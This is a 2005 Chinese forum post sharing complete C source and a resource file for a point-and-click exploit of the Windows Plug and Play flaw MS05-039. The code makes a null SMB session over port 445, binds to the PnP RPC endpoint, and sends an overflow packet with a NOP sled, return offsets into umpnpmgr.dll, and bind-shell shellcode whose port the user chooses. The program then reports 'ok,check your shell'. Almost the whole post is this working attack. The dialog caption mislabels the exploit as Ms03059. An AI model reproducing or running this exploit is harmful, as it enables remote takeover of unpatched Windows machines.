返回列表 发帖
风灵风之子 该用户已被删除
楼主 跳转到 » 倒序看帖
打印
tT
风灵风之子发表于 2005-10-28 23:43 | 只看该作者

ms05039GUI.exe+SDK源代码

  1. ///////////////////////////////////////////////////////////////////////
  2. // ms05039.c Begin
  3. ///////////////////////////////////////////////////////////////////////
  4. &#35;include <stdio.h>
  5. &#35;include <stdlib.h>
  6. &#35;include <string.h>
  7. &#35;include <winsock2.h>
  8. &#35;pragma comment(lib, "ws2_32.lib")
  9. &#35;pragma resource "D:\\borland\\bcc55\\bin\\menu.RES"
  10. &#35;define ID_HOST 2
  11. &#35;define ID_PORT 4
  12. &#35;define ID_ATTACK 5
  13. &#35;define ID_LIST 6
  14. BOOL CALLBACK MainDlgProc(HWND, UINT, WPARAM, LPARAM);
  15. HWND g_hWnd;
  16. HINSTANCE g_hInstance;
  18. unsigned char SMB_Negotiate[] =
  19. "\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
  20. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
  21. "\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
  22. "\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
  23. "\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
  24. "\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
  25. "\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
  26. "\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
  27. "\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";
  29. unsigned char SMB_SessionSetupAndX[] =
  30. "\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
  31. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
  32. "\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
  33. "\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
  34. "\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
  35. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  36. "\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
  37. "\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
  38. "\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
  39. "\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
  40. "\x2E\x00\x30\x00\x00\x00\x00\x00";
  42. unsigned char SMB_SessionSetupAndX2[] =
  43. "\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
  44. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
  45. "\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
  46. "\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
  47. "\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
  48. "\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
  49. "\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
  50. "\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
  51. "\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
  52. "\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
  53. "\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
  54. "\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
  55. "\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
  56. "\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";
  58. unsigned char SMB_TreeConnectAndX[] =
  59. "\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
  60. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
  61. "\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";
  63. unsigned char SMB_TreeConnectAndX_[] =
  64. "\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";
  66. /* browser */
  67. unsigned char SMB_PipeRequest_browser[] =
  68. "\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8"
  69. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
  70. "\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00"
  71. "\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  72. "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
  73. "\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00"
  74. "\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";
  76. unsigned char SMB_PNPEndpoint[] =
  77. /* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
  78. "\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
  79. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
  80. "\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00"
  81. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02"
  82. "\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
  83. "\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00"
  84. "\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00"
  85. "\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11"
  86. "\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A"
  87. "\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";
  89. unsigned char RPC_call[] =
  90. "\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
  91. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
  92. "\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00"
  93. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02"
  94. "\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
  95. "\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00"
  96. "\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00"
  97. "\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00"
  98. "\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00"
  99. "\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00"
  100. "\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  101. "\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90"
  102. "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
  103. "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
  104. "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
  105. "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
  106. /* jmp over - entry point */
  107. "\xEB\x08\x90\x90"
  108. /* pop reg; pop reg; retn; - umpnpmgr.dll */
  109. "\x67\x15\x7a\x76" /* 0x767a1567 */
  110. /* jmp ebx - umpnpmgr.dll
  111. "\x6f\x36\x7a\x76" */
  112. "\xEB\x08\x90\x90\x67\x15\x7a\x76"
  113. "\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90"
  114. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  116. unsigned char RPC_call_end[] =
  117. "\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";
  119. unsigned char bind_shellcode[] =
  120. "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"
  121. "\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8"
  122. "\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc"
  123. "\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae"
  124. "\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f"
  125. "\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc"
  126. "\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc"
  127. "\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67"
  128. "\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7"
  129. "\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35"
  130. "\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64"
  131. "\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6"
  132. "\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f"
  133. "\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e"
  134. "\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60"
  135. "\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67"
  136. "\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a"
  137. "\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8"
  138. "\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66"
  139. "\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7"
  140. "\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57"
  141. "\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";
  142. &#35;define SET_PORTBIND_PORT(buf, port) \
  143. *(unsigned short *)(((buf)+186)) = (port)
  144. void convert_name(char *out, char *name)
  145. {
  146. unsigned long len;
  147. len = strlen(name);
  148. out += len * 2 - 1;
  149. while (len--) {
  150. *out-- = ';\x00';;
  151. *out-- = name[len];
  152. }
  153. }
  154. DWORD WINAPI Attack(LPVOID lparam)
  155. {
  156. HWND hlist,hDlg=(HWND)lparam;
  157. char szHost[15],szPort[6];
  158. struct sockaddr_in addr;
  159. struct hostent *he;
  160. int len;
  161. int sockfd;
  162. unsigned short smblen;
  163. unsigned short bindport;
  164. unsigned char tmp[1024];
  165. unsigned char packet[4096];
  166. unsigned char *ptr;
  167. char recvbuf[4096];
  168. WSADATA wsa;
  169. WSAStartup(MAKEWORD(2,0), &wsa);
  170. GetDlgItemText(hDlg,ID_HOST, szHost, sizeof(szHost));
  171. GetDlgItemText(hDlg,ID_PORT, szPort, sizeof(szPort));
  172. hlist=GetDlgItem(hDlg,ID_LIST);
  173. if ((he = gethostbyname(szHost)) == NULL) {
  174. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"Unable to resolve");
  175. return FALSE;
  176. }
  177. if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  178. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"socket failed");
  179. return FALSE;
  180. }
  181. addr.sin_family = AF_INET;
  182. addr.sin_port = htons(445);
  183. addr.sin_addr = *((struct in_addr *)he->h_addr);
  184. memset(&(addr.sin_zero), ';\0';, 8);
  186. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"connecting to port:445...");
  187. if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
  188. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"connect failed");
  189. return FALSE;
  190. }
  191. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"null session...");
  192. if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
  193. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"send failed");
  194. return FALSE;
  195. }
  196. len = recv(sockfd, recvbuf, 4096, 0);
  197. if ((len <= 10) || (recvbuf[9] != 0)) {
  198. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"failed");
  199. return FALSE;
  200. }
  201. if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
  202. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"send failed");
  203. return FALSE;
  204. }
  205. len = recv(sockfd, recvbuf, 4096, 0);
  206. if (len <= 10) {
  207. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"failed");
  208. return FALSE;
  209. }
  210. if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
  211. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"send failed");
  212. return FALSE;
  213. }
  214. len = recv(sockfd, recvbuf, 4096, 0);
  215. if ((len <= 10) || (recvbuf[9] != 0)) {
  216. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"failed");
  217. return FALSE;
  218. }
  219. ptr = packet;
  220. memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
  221. ptr += sizeof(SMB_TreeConnectAndX)-1;
  222. sprintf(tmp, "\\\\%s\\IPC&#36;", szHost);
  223. convert_name(ptr, tmp);
  224. smblen = strlen(tmp)*2;
  225. ptr += smblen;
  226. smblen += 9;
  227. memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
  229. memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
  230. ptr += sizeof(SMB_TreeConnectAndX_)-1;
  232. smblen = ptr-packet;
  233. smblen -= 4;
  234. memcpy(packet+3, &smblen, 1);
  236. if (send(sockfd, packet, ptr-packet, 0) < 0) {
  237. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"send failed");
  238. return FALSE;
  239. }
  241. len = recv(sockfd, recvbuf, 4096, 0);
  242. if ((len <= 10) || (recvbuf[9] != 0)) {
  243. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"failed");
  244. return FALSE;
  245. }
  247. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"bind pipe...");
  249. if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
  250. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"send failed");
  251. return FALSE;
  252. }
  254. len = recv(sockfd, recvbuf, 4096, 0);
  255. if ((len <= 10) || (recvbuf[9] != 0)) {
  256. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"failed");
  257. return FALSE;
  258. }
  260. if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
  261. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"send failed");
  262. return FALSE;
  263. }
  265. len = recv(sockfd, recvbuf, 4096, 0);
  266. if ((len <= 10) || (recvbuf[9] != 0)) {
  267. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"failed");
  268. return FALSE;
  269. }
  270. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"sending crafted packet...");
  272. // nop
  273. ptr = packet;
  274. memset(packet, ';\x90';, sizeof(packet));
  276. // header & offsets
  277. memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
  278. ptr += sizeof(RPC_call)-1;
  280. // shellcode
  281. bindport = (unsigned short)atoi(szPort);
  282. bindport ^= 0x0437;
  283. SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
  284. memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
  285. // end of packet
  286. memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
  287. RPC_call_end,
  288. sizeof(RPC_call_end)-1);
  290. // sending...
  291. if (send(sockfd, packet, 2196, 0) < 0) {
  292. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"send failed");
  293. return FALSE;
  294. }
  295. SendMessage(hlist,LB_ADDSTRING,0,(LPARAM)"ok,check your shell");
  297. recv(sockfd, recvbuf, 4096, 0);
  299. return 0;
  300. }
  301. int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,PSTR szCmdLine,int iCmdShow)
  302. {
  303. g_hInstance=hInstance;
  304. DialogBox(hInstance, TEXT ("DIALOG_0"), NULL, (DLGPROC)MainDlgProc);
  305. return 0;
  306. }
  307. BOOL CALLBACK MainDlgProc(HWND hDlg,UINT message,WPARAM wParam,LPARAM lParam)
  308. {
  309. switch (message)
  310. {
  311. case WM_INITDIALOG:
  312. g_hWnd = hDlg;
  313. break;
  314. case WM_COMMAND:
  315. switch (LOWORD (wParam))
  316. {
  317. case ID_ATTACK:
  318. {
  319. CreateThread(NULL,NULL,Attack,(LPVOID)hDlg,NULL,NULL);
  320. }
  321. break;
  322. }
  323. break;
  324. case WM_CLOSE:
  325. EndDialog(hDlg,0);
  326. break;
  327. }
  328. return FALSE; ;
  329. }
  330. ///////////////////////////////////////////////////////////////////////
  331. // ms05039.c End
  332. ///////////////////////////////////////////////////////////////////////
  333. // ms05039.rc Begin
  334. ///////////////////////////////////////////////////////////////////////
  335. &#35;define ID_HOST 2
  336. &#35;define ID_PORT 4
  337. &#35;define ID_ATTACK 5
  338. &#35;define ID_LIST 6
  339. DIALOG_0 DIALOG 7, 4, 225, 111
  340. STYLE WS_POPUP |WS_VISIBLE |WS_SYSMENU |WS_THICKFRAME |WS_MAXIMIZEBOX |WS_MINIMIZEBOX |WS_CAPTION
  341. CAPTION "Ms03059 Exploit By CoolDiyer"
  342. LANGUAGE 488, 0
  343. BEGIN
  344. CONTROL "Option",0,"BUTTON",BS_GROUPBOX |WS_CHILD |WS_VISIBLE ,11,9,202,36
  345. CONTROL "Host:",1,"STATIC",SS_LEFT |WS_CHILD |WS_GROUP |WS_VISIBLE ,15,24,21,13
  346. CONTROL "",ID_HOST,"EDIT",ES_LEFT |WS_CHILD |WS_BORDER |WS_TABSTOP |WS_VISIBLE ,38,22,59,13
  347. CONTROL "ShellPort:",3,"STATIC",SS_LEFT |WS_CHILD |WS_GROUP |WS_VISIBLE ,107,25,30,14
  348. CONTROL "",ID_PORT,"EDIT",ES_LEFT |WS_CHILD |WS_BORDER |WS_TABSTOP |WS_VISIBLE ,142,23,25,13
  349. CONTROL "Attack",ID_ATTACK,"BUTTON",BS_DEFPUSHBUTTON |BS_VCENTER |BS_CENTER |WS_CHILD |WS_TABSTOP |WS_VISIBLE ,176,23,31,13
  350. CONTROL "",ID_LIST,"LISTBOX",LBS_NOTIFY |WS_CHILD |WS_BORDER |WS_VSCROLL |WS_VISIBLE ,11,55,202,45
  351. END
  352. ///////////////////////////////////////////////////////////////////////
  353. // ms05039.rc End
  354. ///////////////////////////////////////////////////////////////////////
复制代码
收藏 分享

风灵风之子 该用户已被删除
沙发
风灵风之子发表于 2005-10-28 23:47 | 只看该作者

ms05039GUI.exe+SDK源代码

TOP

返回列表 回复 发帖